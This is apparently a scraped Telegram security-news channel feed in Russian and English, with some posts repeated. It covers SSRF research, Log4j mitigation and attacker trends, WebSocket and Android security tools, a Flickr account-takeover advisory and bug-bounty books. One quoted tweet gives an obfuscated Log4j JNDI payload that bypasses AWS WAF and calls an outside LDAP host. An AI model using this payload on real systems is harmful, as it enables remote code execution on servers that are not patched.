https://youtu.be/voTHFdL9S2k
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
YouTube
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in…
https://logging.apache.org/log4j/2.x/security.html
Mitigation
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
Mitigation
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
Forwarded from Pentesting News
STEWS.pdf
723.6 KB
Realtime Problems: #Exposing #WebSocket Servers Hidden in Plain Sight
A Security Tool
https://github.com/PalindromeLabs/STEWS
A Security Tool
https://github.com/PalindromeLabs/STEWS
Forwarded from HackGit
Aparoid - Static and dynamic #Android application #security analysis.
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
GitHub
GitHub - stefan2200/aparoid: Static and dynamic Android application security analysis
Static and dynamic Android application security analysis - stefan2200/aparoid
Forwarded from LeakInfo
Некоторые злоумышленники, использующие уязвимость Apache #Log4j, переключились с URL-адресов обратного вызова LDAP на RMI или даже использовали их одновременно.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
https://twitter.com/11xuxx/status/1471826191724257285?t=uud1PH6uYJEnH7H4CQILNg&s=19Вот кстати пример, как обходят AWS WAF, поэтому и нужны фиксы на всех точках возможных атак
Twitter
xxux11 ᯲ ̸
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF
очередная уязвимость и выпуск 2.17 версии, чтоб защититься от DoS атаки через log4j
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
BleepingComputer
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes…
https://twitter.com/therceman/status/1470768985302048774
https://therceman.medium.com/log4j-vulnerability-cheatsheet-66b7aeabc607
https://therceman.medium.com/log4j-vulnerability-cheatsheet-66b7aeabc607
Twitter
Anton
Bug Bounty Tip :: Log4j Vulnerability Cheatsheet 🔹 How It Works 🔹 Test Environments 🔹 Challenges & Labs (Rooms) 🔹 Where Payloads can be Injected 🔹 What Information can be Extracted 🔹 How To Identify (Services & Scanners)
https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/
Интересный баг, связанный с неправильной имплементацией механизма аутентификации через AWS Cognito, позволяющий залогиниться в любой аккаунт.
Интересный баг, связанный с неправильной имплементацией механизма аутентификации через AWS Cognito, позволяющий залогиниться в любой аккаунт.
(Web-)Insecurity Blog
Flickr Account Takeover
This post gives a deep dive into a critical security flaw that was present in Flickr’s login flow.
The authentication at identity.flickr.com is implemented using AWS Cognito. By exploiting configuration issues and violations of the OpenID Connect specification…
The authentication at identity.flickr.com is implemented using AWS Cognito. By exploiting configuration issues and violations of the OpenID Connect specification…
Forwarded from Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
Name: Bug Bounty Hunting for Web Security
Author: Sanjib Sinha
Year: 2019
Start with the basics of bug hunting and learn more about implementing an offensive approach by finding vulnerabilities in web applications. Getting an introduction to Kali Linux, you will take a close look at the types of tools available to you and move on to set up your virtual lab.
You will then discover how request forgery injection works on web pages
and applications in a mission-critical setup. Moving on to the most challenging task for any web application, you will take a look at how cross-site noscripting works and find out about effective ways to exploit it.
Скачать.
Author: Sanjib Sinha
Year: 2019
Start with the basics of bug hunting and learn more about implementing an offensive approach by finding vulnerabilities in web applications. Getting an introduction to Kali Linux, you will take a close look at the types of tools available to you and move on to set up your virtual lab.
You will then discover how request forgery injection works on web pages
and applications in a mission-critical setup. Moving on to the most challenging task for any web application, you will take a look at how cross-site noscripting works and find out about effective ways to exploit it.
Скачать.
Forwarded from Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
Name: Bug Bounty Automation With Python: The secrets of bug hunting.
Author: Syed Abuthahir
This book demonstrates the hands-on
automation using python for each topic mentioned in the table of contents.
This book gives you a basic idea of how to automate something to reduce the
repetitive tasks and perform automated ways of OSINT and
Reconnaissance.This book also gives you the overview of the python
programming in the python crash course section. This book is the first part of
bug bounty automation with python series.
Скачать.
Author: Syed Abuthahir
This book demonstrates the hands-on
automation using python for each topic mentioned in the table of contents.
This book gives you a basic idea of how to automate something to reduce the
repetitive tasks and perform automated ways of OSINT and
Reconnaissance.This book also gives you the overview of the python
programming in the python crash course section. This book is the first part of
bug bounty automation with python series.
Скачать.